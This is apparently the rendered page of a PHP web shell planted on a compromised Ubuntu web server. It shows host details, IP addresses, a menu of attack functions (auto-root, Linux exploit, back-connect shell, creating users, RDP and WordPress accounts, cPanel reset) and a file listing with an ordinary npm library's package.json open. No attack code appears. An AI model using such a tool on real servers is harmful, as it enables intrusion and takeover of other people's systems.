Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
entities /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
maps
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.travis.yml
70
B
-rw-r--r--
LICENSE
1.23
KB
-rw-r--r--
index.js
819
B
-rw-r--r--
package.json
1.42
KB
-rw-r--r--
readme.md
911
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "entities", "version": "1.1.2", "description": "Encode & decode XML/HTML entities with ease", "author": "Felix Boehm <me@feedic.com>", "keywords": [ "html", "xml", "entity", "decoding", "encoding" ], "main": "./index.js", "directories": { "test": "test" }, "devDependencies": { "mocha": "^5.0.1", "mocha-lcov-reporter": "*", "coveralls": "*", "istanbul": "*", "jshint": "2" }, "scripts": { "test": "mocha && npm run lint", "lint": "jshint index.js lib/*.js test/*.js", "lcov": "istanbul cover _mocha --report lcovonly -- -R spec", "coveralls": "npm run lint && npm run lcov && (cat coverage/lcov.info | coveralls || exit 0)" }, "repository": { "type": "git", "url": "git://github.com/fb55/entities.git" }, "license": "BSD-2-Clause", "jshintConfig": { "eqeqeq": true, "freeze": true, "latedef": "nofunc", "noarg": true, "nonbsp": true, "quotmark": "double", "undef": true, "unused": true, "trailing": true, "eqnull": true, "proto": true, "smarttabs": true, "node": true, "globals": { "describe": true, "it": true } }, "prettier": { "tabWidth": 4 } ,"_resolved": "https://registry.npmjs.org/entities/-/entities-1.1.2.tgz" ,"_integrity": "sha512-f2LZMYl1Fzu7YSBKg+RoROelpOaNrcGmE9AZubeDfrCEia483oW4MI4VyFd5VNHIgQ/7qm1I0wUHK1eJnn2y2w==" ,"_from": "entities@^1.1.1" }
Close